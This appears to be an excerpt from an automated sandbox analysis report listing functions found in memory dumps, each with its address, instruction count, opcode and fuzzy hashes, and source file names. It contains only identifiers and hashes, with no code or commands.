                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 915f86325df18b452d8f671c2a38dfef881c1d63453cbe30d4556fc23f1844ef
                                                                                  • Instruction ID: 5f4ee3b6eb618890a436c1c5e93dbf17d833a561685e167e01ff3a5e14b13581
                                                                                  • Opcode Fuzzy Hash: 915f86325df18b452d8f671c2a38dfef881c1d63453cbe30d4556fc23f1844ef
                                                                                  • Instruction Fuzzy Hash: 56F06D71A0924DAFCF01CF94D9009A9BFB5EB0A314F04819AE854972A2D7329E52EB51
                                                                                  Function 00C0B2E8 Relevance: .0, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 853ed89ef442cd95c46f3c29ff2cda1c922109ac106c139c8751752dc7e3a887
                                                                                  • Instruction ID: dcfd7b2ce5e16a21e26b6627c9f6f2f8d4ea090fd56ca3a187e42edf3711dcb9
                                                                                  • Opcode Fuzzy Hash: 853ed89ef442cd95c46f3c29ff2cda1c922109ac106c139c8751752dc7e3a887
                                                                                  • Instruction Fuzzy Hash: C5F0897490524CEFCB15CFA5D8009ADBFB8EB5A700F1081EAD844933A2D7315E46EB61
                                                                                  Function 070E5898 Relevance: .0, Instructions: 32COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2191082568.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70e0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 26692947448d5b2e7815ccabb257c37ebc9d29542be9fcc87056a011f2fb5275
                                                                                  • Instruction ID: 7c6b4669a882c87943b895644d6c2c85a1287f5330bf01250b4286745fcef37b
                                                                                  • Opcode Fuzzy Hash: 26692947448d5b2e7815ccabb257c37ebc9d29542be9fcc87056a011f2fb5275
                                                                                  • Instruction Fuzzy Hash: FE0112B4A04218CFDB64DF64D958AD9B3B1FB49300F1181D5A50EA7788CB349E858F11
                                                                                  Function 00C09610 Relevance: .0, Instructions: 32COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a5f1c2ab8a27074d4e073cbc93096be9e8d6f6d74c327c2a8a3e004cfaa3bf7e
                                                                                  • Instruction ID: 7f505a8d02bc2776e47aee4278376485c157c2722b9a7926e786ec6caf48e766
                                                                                  • Opcode Fuzzy Hash: a5f1c2ab8a27074d4e073cbc93096be9e8d6f6d74c327c2a8a3e004cfaa3bf7e
                                                                                  • Instruction Fuzzy Hash: 7AF0E771D0060AEBCF01DF99D8009EEBB75FF89320F10C559EA5837251D732A6A6DBA1
                                                                                  Function 00C082E4 Relevance: .0, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2430d722f2416094a089be4d6e8a43149ffafa9d41cbac04f662980e3966d02e
                                                                                  • Instruction ID: 88b59932e2b21fe7e4427bbfab27294d5c7cecefa9a0ca117091a47f08d350ef
                                                                                  • Opcode Fuzzy Hash: 2430d722f2416094a089be4d6e8a43149ffafa9d41cbac04f662980e3966d02e
                                                                                  • Instruction Fuzzy Hash: AE01C074E112689FDB65DF60D960BDCBBB1BF08300F1081E9EA09A7244DB712E86DF00
                                                                                  Function 00C0C619 Relevance: .0, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4963fbedf103f52f034390df9671ff277c137ff19bec54e07cd1dd057cb7bffb
                                                                                  • Instruction ID: 064c23430f09268e2e0b64617354bf4b510be93349f564103b4cf542ebcc3f79
                                                                                  • Opcode Fuzzy Hash: 4963fbedf103f52f034390df9671ff277c137ff19bec54e07cd1dd057cb7bffb
                                                                                  • Instruction Fuzzy Hash: 30F02B308093449FC721CFE8E8959A8BF74DB42310F10A2DDEC0497393D6325E42D752
                                                                                  Function 00C07758 Relevance: .0, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e45b046145c06ac82512089e4a9ead09e78bbcbf3db4ac01edf15c3e43b13c84
                                                                                  • Instruction ID: 38a2d825afd2daec8f974d0eace078b0cdfa635d056be8116c7793c6db377a10
                                                                                  • Opcode Fuzzy Hash: e45b046145c06ac82512089e4a9ead09e78bbcbf3db4ac01edf15c3e43b13c84
                                                                                  • Instruction Fuzzy Hash: 65F08239809108BBCB05CF94ED41AA97F75BB45310F149199EC1427291C7329E22EBA1
                                                                                  Function 00ADEB10 Relevance: .0, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 389ff7faaecddd1a2ffb7e253d2758254d14f91d902d498c82b0e041aac7aaf5
                                                                                  • Instruction ID: 23ebf6295a8620c10d4d152e7a7ffd71ba3fd1aea58e9f7ece7c12df9264294e
                                                                                  • Opcode Fuzzy Hash: 389ff7faaecddd1a2ffb7e253d2758254d14f91d902d498c82b0e041aac7aaf5
                                                                                  • Instruction Fuzzy Hash: 0EF08234809248AFC711DBA4D851AADBFB4EB46300F14C0DBE84557392C6355A01DB61
                                                                                  Function 00C05898 Relevance: .0, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d4e6d98e7751f37ee91680d616fac083de7ea820e7101dc0a630c670b98d8e2d
                                                                                  • Instruction ID: 13f8e8b224fa268f8594d5ff532097b01082f8aed35d066298077b609bc9dc95
                                                                                  • Opcode Fuzzy Hash: d4e6d98e7751f37ee91680d616fac083de7ea820e7101dc0a630c670b98d8e2d
                                                                                  • Instruction Fuzzy Hash: F8F05E78D08248AFCB44DF95D440AADBFB4AB45310F14C1AAEC5456281D6355A41DF61
                                                                                  Function 00C0AFE3 Relevance: .0, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 71a9777a7cee31c6cfe71355592b723a07657280e1f373ef7ca5841eb927bc98
                                                                                  • Instruction ID: a08dbe651693234be5744e02f7b29459c7958465be52a278d9cbe314ba8280f7
                                                                                  • Opcode Fuzzy Hash: 71a9777a7cee31c6cfe71355592b723a07657280e1f373ef7ca5841eb927bc98
                                                                                  • Instruction Fuzzy Hash: 8AF0A07490924CAFC701CBA4E8009AEBFB8EB45304F1081EAEC5853392C7315F52DBA1
                                                                                  Function 00C05789 Relevance: .0, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57c51b9732c1a5d9fbf716ae45edcdd9f38cfcb79c29998e72da9a5602b46127
                                                                                  • Instruction ID: 28844096bb0dcaada7458238a9f4b2798224b1f9191e50fb82442b26d9ad2e03
                                                                                  • Opcode Fuzzy Hash: 57c51b9732c1a5d9fbf716ae45edcdd9f38cfcb79c29998e72da9a5602b46127
                                                                                  • Instruction Fuzzy Hash: 67F0E57480E248EFC711CBA4D84099DBF74EB46300F1481DAD80457393D6315E42DB61
                                                                                  Function 00C06BB1 Relevance: .0, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 98431aa50df3ead416a7ecb9a672577f641c5c887c5070fa0564507b3f8f6f65
                                                                                  • Instruction ID: 96c77f756cd7a3aece49bbd8be6e315582f97513ac87307aa110e61dd0199117
                                                                                  • Opcode Fuzzy Hash: 98431aa50df3ead416a7ecb9a672577f641c5c887c5070fa0564507b3f8f6f65
                                                                                  • Instruction Fuzzy Hash: ECE06574D05148AFC754DFA4D455B68BBF4DB44315F1040EDC80897381E6325E46DB51
                                                                                  Function 00C055BA Relevance: .0, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cd6ea355870c48aaddda8c16f25d31521cefe2c44a077a5c970e7e61d2cff02f
                                                                                  • Instruction ID: bac378f0ece36e553bee3ece1852d20c76d3798f5547222633d2060a15ea37c0
                                                                                  • Opcode Fuzzy Hash: cd6ea355870c48aaddda8c16f25d31521cefe2c44a077a5c970e7e61d2cff02f
                                                                                  • Instruction Fuzzy Hash: 61F01CB4E09248AFC764DBA9D855B9DBBF4EB48304F1484E9D818A7382D6355E42CF41
                                                                                  Function 00ADE4F0 Relevance: .0, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1bade48d69860e2d9bbf8b1c374943725d03a024997b4d57a8925714c0b97c4e
                                                                                  • Instruction ID: 887efd244fc323b469865ed5d3a2bec3a587026ce5e52e372fc38ab830924b90
                                                                                  • Opcode Fuzzy Hash: 1bade48d69860e2d9bbf8b1c374943725d03a024997b4d57a8925714c0b97c4e
                                                                                  • Instruction Fuzzy Hash: 4DF0E57490D288AFCB11DFA4EC509A9BF799B86300F1480DAE84557382D7319E02DB61
                                                                                  Function 00C0BAD8 Relevance: .0, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a71ef338580e5e236926781985dab693868594786068da95537d13a5c5e25358
                                                                                  • Instruction ID: 70dea4c2337d07719a49c569b6eaff354c05849180bc3534122583dfd0db5e3f
                                                                                  • Opcode Fuzzy Hash: a71ef338580e5e236926781985dab693868594786068da95537d13a5c5e25358
                                                                                  • Instruction Fuzzy Hash: 44F0ED74A18308DFC721CFA4D8858BCBBB8AB42301F1081CEC84817286C7306E02DBA6
                                                                                  Function 00C06A98 Relevance: .0, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ad771e5c60a6cc94d50821471a84569d0cf1b8c4098b66c2c6da180e9d6e5f31
                                                                                  • Instruction ID: d1edc415b07a2469d77dcb77794b0655d7d32ba8acb0ecc45a0bc5963bc43785
                                                                                  • Opcode Fuzzy Hash: ad771e5c60a6cc94d50821471a84569d0cf1b8c4098b66c2c6da180e9d6e5f31
                                                                                  • Instruction Fuzzy Hash: 90F08C74D08248ABC710DFA4E440AACBFB8AB85310F14C0E9980427381D6319F61EB91
                                                                                  Function 00C07F80 Relevance: .0, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2053120bd5f9684c576bc5bbe0068304147ecd7be45e762febc2de0cc0703e00
                                                                                  • Instruction ID: b84b5bbb2501ddf4d45632bba5d98869afc32eba118f1af468af80573edcca4f
                                                                                  • Opcode Fuzzy Hash: 2053120bd5f9684c576bc5bbe0068304147ecd7be45e762febc2de0cc0703e00
                                                                                  • Instruction Fuzzy Hash: 41F0307590910DFBCF04CFD4E9409ADBB75FB45310F108199EC0427291C7329E62EB91
                                                                                  Function 00AD09A8 Relevance: .0, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7e9cb124fc1b7f40b8f03c16799a1d4bd1b1974af7afccc24d8f99a97e896fa9
                                                                                  • Instruction ID: 1b0891a5ea3a851ce79351742395431a856ec81b48ba68c8af8a2ceddd583ae9
                                                                                  • Opcode Fuzzy Hash: 7e9cb124fc1b7f40b8f03c16799a1d4bd1b1974af7afccc24d8f99a97e896fa9
                                                                                  • Instruction Fuzzy Hash: F7F082B16082419FEB01DB25D92CB697FB0AB05314F24459ED052CB393DB765405CB40
                                                                                  Function 00C06870 Relevance: .0, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 38e291af3d0a7e93069958103f91986b16243ed1d84dbac59aa79dac6842d5bc
                                                                                  • Instruction ID: ec27ed2f91ce30d238b0b2361cc950b7ac641ccccccd41b84fc0e76a68cc2812
                                                                                  • Opcode Fuzzy Hash: 38e291af3d0a7e93069958103f91986b16243ed1d84dbac59aa79dac6842d5bc
                                                                                  • Instruction Fuzzy Hash: A0E022B4D09288BFC320DBA4D811BBCBFB4DB45304F0881E9C848572D2DB316E62C7A1
                                                                                  Function 00C05A80 Relevance: .0, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 084806f8ab82d9eb0e48be4ef1aa99241cc7ec7b7fcd5f9845c40628ffa02f1b
                                                                                  • Instruction ID: 7e4c3ca0f87930e4801a2c86cb4d233a560868c00202929860c3b030d528f9a3
                                                                                  • Opcode Fuzzy Hash: 084806f8ab82d9eb0e48be4ef1aa99241cc7ec7b7fcd5f9845c40628ffa02f1b
                                                                                  • Instruction Fuzzy Hash: 0EE09234A0D388AFC715CBA4DC50969BFB4AB82314F1482DED855572D2CB315E42DB92
                                                                                  Function 00C0B518 Relevance: .0, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e3cdd5d542a3bf883fcf445e134049cf2c6cfaf69580a17da0b8a58b2cde66f1
                                                                                  • Instruction ID: eb7225484fca7b3f2de6c31c87804ede35b8a1c8457a3ffc2a5ad14f1c8aa8a5
                                                                                  • Opcode Fuzzy Hash: e3cdd5d542a3bf883fcf445e134049cf2c6cfaf69580a17da0b8a58b2cde66f1
                                                                                  • Instruction Fuzzy Hash: E4E0D8B4909248ABC704DFB4ED41968BFB8EB86314F1081DDD80417381CB319E86DB91
                                                                                  Function 00C0B0D8 Relevance: .0, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 14c462e4d4304a2fc730c9d6d94a3825327a6e1cf5f5d8f1dcd2e358c90359f8
                                                                                  • Instruction ID: 0db88010aca3bf5436fbbc1d3d6864123e1f1f75eddde1e7087e8309f8587137
                                                                                  • Opcode Fuzzy Hash: 14c462e4d4304a2fc730c9d6d94a3825327a6e1cf5f5d8f1dcd2e358c90359f8
                                                                                  • Instruction Fuzzy Hash: 9CF0F275A04209EBCB00CF94D940AADBBB5EB48310F108099E82862291C7329E62EB41
                                                                                  Function 00C00078 Relevance: .0, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 256eece1a13be1b8cd7aa16f3fbc52f931a645c6ca2dfd937586501f37fd056d
                                                                                  • Instruction ID: 1ee18294387d4fc8a55d43f52ebeca620892ad99f198e0816c654c448331eae3
                                                                                  • Opcode Fuzzy Hash: 256eece1a13be1b8cd7aa16f3fbc52f931a645c6ca2dfd937586501f37fd056d
                                                                                  • Instruction Fuzzy Hash: 88E0D875D092089BC710CB94E841BADBBB4AB46314F2591E9D80833382CA315E02CB95
                                                                                  Function 00C061D0 Relevance: .0, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4cb856d7d3604289aa6dd8e141933a72ffcb66809a8246cea0879dc2ced1b803
                                                                                  • Instruction ID: ed7f40aacf9dc4f6dae0dd9f841e41bd77cc104a6d1eaa9d284d8e4dde63c0ce
                                                                                  • Opcode Fuzzy Hash: 4cb856d7d3604289aa6dd8e141933a72ffcb66809a8246cea0879dc2ced1b803
                                                                                  • Instruction Fuzzy Hash: 81E092349093889FC714CFA4EC5496CBFB4FB46304F1091E9D80457292C6315E86CB91
                                                                                  Function 00C04B37 Relevance: .0, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4ccbaefad074dc3aabbca72f7acf0c12c00b96d96adf0c8a18f2f44ed5b23239
                                                                                  • Instruction ID: 2c78e08aeb2f903ee93abc75436d23fefcfb74a81d02daa96007e2beead8f761
                                                                                  • Opcode Fuzzy Hash: 4ccbaefad074dc3aabbca72f7acf0c12c00b96d96adf0c8a18f2f44ed5b23239
                                                                                  • Instruction Fuzzy Hash: 24E0DF71509248ABC790EFF498407AFBFE8BB05614F004DDED16593141EE324A22D7AA
                                                                                  Function 00C08D93 Relevance: .0, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a9e1fd0421069805ae310c1e0e5e3c449a08f2da7c9bcab51a0048a698a787e7
                                                                                  • Instruction ID: 2c3eca4697b3968163722628491abc37b7ec62ae1d34db6aa1d8903b060c7284
                                                                                  • Opcode Fuzzy Hash: a9e1fd0421069805ae310c1e0e5e3c449a08f2da7c9bcab51a0048a698a787e7
                                                                                  • Instruction Fuzzy Hash: 1DF07F74A01269DFCBA5DFA4CD48BDCBBB1AB48304F1091E9951DA7254D7315E82DF00
                                                                                  Function 00C04542 Relevance: .0, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 75339dcddc5e16018d8efd4a7c496dc6c2619b70ec11973316771317a1248d72
                                                                                  • Instruction ID: 23b9d003bafe20fe8e9878bd828d6ea1bff7d526501c61be3d831af368b5059a
                                                                                  • Opcode Fuzzy Hash: 75339dcddc5e16018d8efd4a7c496dc6c2619b70ec11973316771317a1248d72
                                                                                  • Instruction Fuzzy Hash: 58F01CB1E092489FCB54CFA8D84069CBBB0EB89314F1481EED81893392D7355A02DF40
                                                                                  Function 070F5BA0 Relevance: .0, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2191082568.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70e0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b13adfbed6ca621ac409af082d10debf6de16c8c5fef98cc4de58e5316aa4fe8
                                                                                  • Instruction ID: 6b5b62bc73c1b7b57ea31cc16829fde9ce91955b5da266a1751f88b185c9741f
                                                                                  • Opcode Fuzzy Hash: b13adfbed6ca621ac409af082d10debf6de16c8c5fef98cc4de58e5316aa4fe8
                                                                                  • Instruction Fuzzy Hash: 0DE0C9B4E05208EFCB84DFA8D844AACFBF4EB48310F10C1A99818A3351D7319A52DF84
                                                                                  Function 070FD3E8 Relevance: .0, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2191082568.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70e0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b13adfbed6ca621ac409af082d10debf6de16c8c5fef98cc4de58e5316aa4fe8
                                                                                  • Instruction ID: fb6c2596eea431323b66e64c3078ac8d245ddb285f40d581d4f5b859c052f8d9
                                                                                  • Opcode Fuzzy Hash: b13adfbed6ca621ac409af082d10debf6de16c8c5fef98cc4de58e5316aa4fe8
                                                                                  • Instruction Fuzzy Hash: 85E0C9B5E04208EFCB84DFA8D445AACBBF4EB48310F10C1E99918A3351D771AA52DF55
                                                                                  Function 070FA3F0 Relevance: .0, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2191082568.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70e0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b13adfbed6ca621ac409af082d10debf6de16c8c5fef98cc4de58e5316aa4fe8
                                                                                  • Instruction ID: c9604ae1e6d1f55fe518085e14e316f8cac531acb6dae84b947d1335cf4d4681
                                                                                  • Opcode Fuzzy Hash: b13adfbed6ca621ac409af082d10debf6de16c8c5fef98cc4de58e5316aa4fe8
                                                                                  • Instruction Fuzzy Hash: 46E0C9B4E04208EFCB84DFA8D544AACBBF4EB89310F10C1A99918A3351D771AE52DF50
                                                                                  Function 00C058A8 Relevance: .0, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: df81fcfbfb6723afe39efba9ab736f9e4ac6e5668ccc2d7f2c42a5d8e6cf25fd
                                                                                  • Instruction ID: 06f056a87f771f82efece704c9d64240d15d3a155696b36b35e2cc237110392f
                                                                                  • Opcode Fuzzy Hash: df81fcfbfb6723afe39efba9ab736f9e4ac6e5668ccc2d7f2c42a5d8e6cf25fd
